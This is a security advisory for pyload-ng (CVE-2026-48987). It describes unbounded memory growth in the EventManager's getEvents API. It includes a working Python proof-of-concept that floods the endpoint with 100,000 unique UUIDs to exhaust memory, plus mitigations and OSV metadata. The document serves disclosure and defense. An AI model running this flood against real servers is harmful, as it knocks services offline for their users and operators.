PYSEC-2026-2992
Vulnerability from pysec - Published: 2026-07-13 15:46 - Updated: 2026-07-13 16:05Description:
The EventManager module in pyload manages a list of Client instances for subscribing to events. The addition of each unique uuid from the get_events API causes the creation of a Client instance that gets appended to the clients list. Although there is a clean() method available in the EventManager module for removing non-responding Client instances, this method is never used in the EventManager or in the entire core application code. Consequently, this causes an uncontrolled growth in memory consumption until it becomes exhausted, resulting in a DoS attack.
Vulnerable Code:
https://github.com/pyload/pyload/blob/355c3f8d78a91f72d049e58f1edee8a972f845eb/src/pyload/core/managers/event_manager.py#L16-L17
Here the client is added to the
clientslist but never cleared the inactive clients.
Exploitation:
- Start pyLoad server (Ensure the
pyloadserver is running) - Authenticate: Obtain a session cookie or an API key (Here i used the API key).
- Send Requests: Run the below poc script to send a large number of requests to the
getEventsAPI endpoint, each with a uniqueuuid.
import requests
import uuid
import time
# Configuration
URL = "http://localhost:8000/api/getEvents"
NUM_REQUESTS = 100000
headers = {
"X-API-Key" : "<YOUR_APIKEY>"
}
print(f"Starting DoS attack: sending {NUM_REQUESTS} unique UUIDs...")
for i in range(NUM_REQUESTS):
# Generating a new UUID
uid = str(uuid.uuid4())
try:
# Sending request
requests.get(URL, params={"uuid": uid}, headers=headers, timeout=5)
if i % 1000 == 0:
print(f"Sent {i} requests...")
except requests.exceptions.RequestException as e:
print(f"Error at request {i}: {e}")
break
print("Attack complete. Check memory usage.")
- Monitor Memory: Monitor the memory usage of the
pyloadprocess (e.g., usingtop,psor the following commands).
PID=$(pgrep -f "pyload"); while true; do ps -o rss= -p $PID; sleep 1; done
- Observe Growth: Notice that the memory consumption increases and never decreases, even after the requests stop and 30 seconds.
https://github.com/user-attachments/assets/28d460c9-655d-45a1-a47f-c0f4d196f686
Impact:
- Denial of Service (DoS). The
pyloadprocess will consume all available system memory, leading to an Out-of-Memory (OOM) kill by the operating system or system-wide instability, affecting other services on the host.
Mitigations:
- Invoke
clean(): Callself.clean()at the beginning of theget_eventsmethod to purge inactive clients before processing new ones. - Rate Limiting: Implement rate limiting on the
getEventsendpoint to prevent a single client from flooding the server with unique UUIDs.
| Name | purl | pyload-ng | pkg:pypi/pyload-ng |
|---|
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pyload-ng",
"purl": "pkg:pypi/pyload-ng"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.5.0b3.dev100"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.5.0a5.dev528",
"0.5.0a5.dev532",
"0.5.0a5.dev535",
"0.5.0a5.dev536",
"0.5.0a5.dev537",
"0.5.0a5.dev539",
"0.5.0a5.dev540",
"0.5.0a5.dev545",
"0.5.0a5.dev562",
"0.5.0a5.dev564",
"0.5.0a5.dev565",
"0.5.0a6.dev570",
"0.5.0a6.dev578",
"0.5.0a6.dev587",
"0.5.0a7.dev596",
"0.5.0a8.dev602",
"0.5.0a9.dev615",
"0.5.0a9.dev629",
"0.5.0a9.dev632",
"0.5.0a9.dev641",
"0.5.0a9.dev643",
"0.5.0a9.dev655",
"0.5.0a9.dev806",
"0.5.0b1.dev1",
"0.5.0b1.dev2",
"0.5.0b1.dev3",
"0.5.0b1.dev4",
"0.5.0b1.dev5",
"0.5.0b2.dev10",
"0.5.0b2.dev11",
"0.5.0b2.dev12",
"0.5.0b2.dev9",
"0.5.0b3.dev100",
"0.5.0b3.dev13",
"0.5.0b3.dev14",
"0.5.0b3.dev17",
"0.5.0b3.dev18",
"0.5.0b3.dev19",
"0.5.0b3.dev20",
"0.5.0b3.dev21",
"0.5.0b3.dev22",
"0.5.0b3.dev24",
"0.5.0b3.dev26",
"0.5.0b3.dev27",
"0.5.0b3.dev28",
"0.5.0b3.dev29",
"0.5.0b3.dev30",
"0.5.0b3.dev31",
"0.5.0b3.dev32",
"0.5.0b3.dev33",
"0.5.0b3.dev34",
"0.5.0b3.dev35",
"0.5.0b3.dev38",
"0.5.0b3.dev39",
"0.5.0b3.dev40",
"0.5.0b3.dev41",
"0.5.0b3.dev42",
"0.5.0b3.dev43",
"0.5.0b3.dev44",
"0.5.0b3.dev45",
"0.5.0b3.dev46",
"0.5.0b3.dev47",
"0.5.0b3.dev48",
"0.5.0b3.dev49",
"0.5.0b3.dev50",
"0.5.0b3.dev51",
"0.5.0b3.dev52",
"0.5.0b3.dev53",
"0.5.0b3.dev54",
"0.5.0b3.dev57",
"0.5.0b3.dev60",
"0.5.0b3.dev62",
"0.5.0b3.dev64",
"0.5.0b3.dev65",
"0.5.0b3.dev66",
"0.5.0b3.dev67",
"0.5.0b3.dev68",
"0.5.0b3.dev69",
"0.5.0b3.dev70",
"0.5.0b3.dev71",
"0.5.0b3.dev72",
"0.5.0b3.dev73",
"0.5.0b3.dev74",
"0.5.0b3.dev75",
"0.5.0b3.dev76",
"0.5.0b3.dev77",
"0.5.0b3.dev78",
"0.5.0b3.dev79",
"0.5.0b3.dev80",
"0.5.0b3.dev81",
"0.5.0b3.dev82",
"0.5.0b3.dev85",
"0.5.0b3.dev87",
"0.5.0b3.dev88",
"0.5.0b3.dev89",
"0.5.0b3.dev90",
"0.5.0b3.dev91",
"0.5.0b3.dev92",
"0.5.0b3.dev93",
"0.5.0b3.dev94",
"0.5.0b3.dev95",
"0.5.0b3.dev96",
"0.5.0b3.dev97",
"0.5.0b3.dev98",
"0.5.0b3.dev99"
]
}
],
"aliases": [
"CVE-2026-48987",
"GHSA-c2f9-4mc8-j656"
],
"details": "## Description:\nThe `EventManager` module in `pyload` manages a list of `Client` instances for subscribing to events. The addition of each unique `uuid` from the `get_events` API causes the creation of a `Client` instance that gets appended to the `clients` list. Although there is a `clean()` method available in the `EventManager` module for removing non-responding `Client` instances, this method is never used in the `EventManager` or in the entire core application code. Consequently, this causes an uncontrolled growth in memory consumption until it becomes exhausted, resulting in a DoS attack.\n\n## Vulnerable Code:\nhttps://github.com/pyload/pyload/blob/355c3f8d78a91f72d049e58f1edee8a972f845eb/src/pyload/core/managers/event_manager.py#L16-L17\n\n\u003e Here the client is added to the `clients` list but never cleared the inactive clients.\n\n## Exploitation:\n1. **Start pyLoad server** (Ensure the `pyload` server is running)\n2. **Authenticate**: Obtain a session cookie or an API key (Here i used the API key).\n3. **Send Requests**: Run the below poc script to send a large number of requests to the `getEvents` API endpoint, each with a unique `uuid`.\n```python\nimport requests\nimport uuid\nimport time\n\n# Configuration\nURL = \"http://localhost:8000/api/getEvents\"\nNUM_REQUESTS = 100000\n\nheaders = {\n\t\"X-API-Key\" : \"\u003cYOUR_APIKEY\u003e\"\n}\n\nprint(f\"Starting DoS attack: sending {NUM_REQUESTS} unique UUIDs...\")\n\nfor i in range(NUM_REQUESTS):\n # Generating a new UUID\n uid = str(uuid.uuid4())\n try:\n # Sending request\n requests.get(URL, params={\"uuid\": uid}, headers=headers, timeout=5)\n if i % 1000 == 0:\n print(f\"Sent {i} requests...\")\n except requests.exceptions.RequestException as e:\n print(f\"Error at request {i}: {e}\")\n break\n\nprint(\"Attack complete. Check memory usage.\")\n\n```\n5. **Monitor Memory**: Monitor the memory usage of the `pyload` process (e.g., using `top`, `ps` or the following commands).\n```bash\nPID=$(pgrep -f \"pyload\"); while true; do ps -o rss= -p $PID; sleep 1; done\n```\n\n6. **Observe Growth**: Notice that the memory consumption increases and never decreases, even after the requests stop and 30 seconds.\n\nhttps://github.com/user-attachments/assets/28d460c9-655d-45a1-a47f-c0f4d196f686\n\n## Impact:\n- Denial of Service (DoS). The `pyload` process will consume all available system memory, leading to an Out-of-Memory (OOM) kill by the operating system or system-wide instability, affecting other services on the host.\n\n## Mitigations:\n- **Invoke `clean()`**: Call `self.clean()` at the beginning of the `get_events` method to purge inactive clients before processing new ones.\n- **Rate Limiting**: Implement rate limiting on the `getEvents` endpoint to prevent a single client from flooding the server with unique UUIDs.",
"id": "PYSEC-2026-2992",
"modified": "2026-07-13T16:05:52.818508Z",
"published": "2026-07-13T15:46:29.982699Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-c2f9-4mc8-j656"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyload/pyload"
},
{
"type": "PACKAGE",
"url": "https://pypi.org/project/pyload-ng"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-c2f9-4mc8-j656"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48987"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "pyLoad: Unbounded Memory Growth Leading to DoS and Potential DDoS in EventManager"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.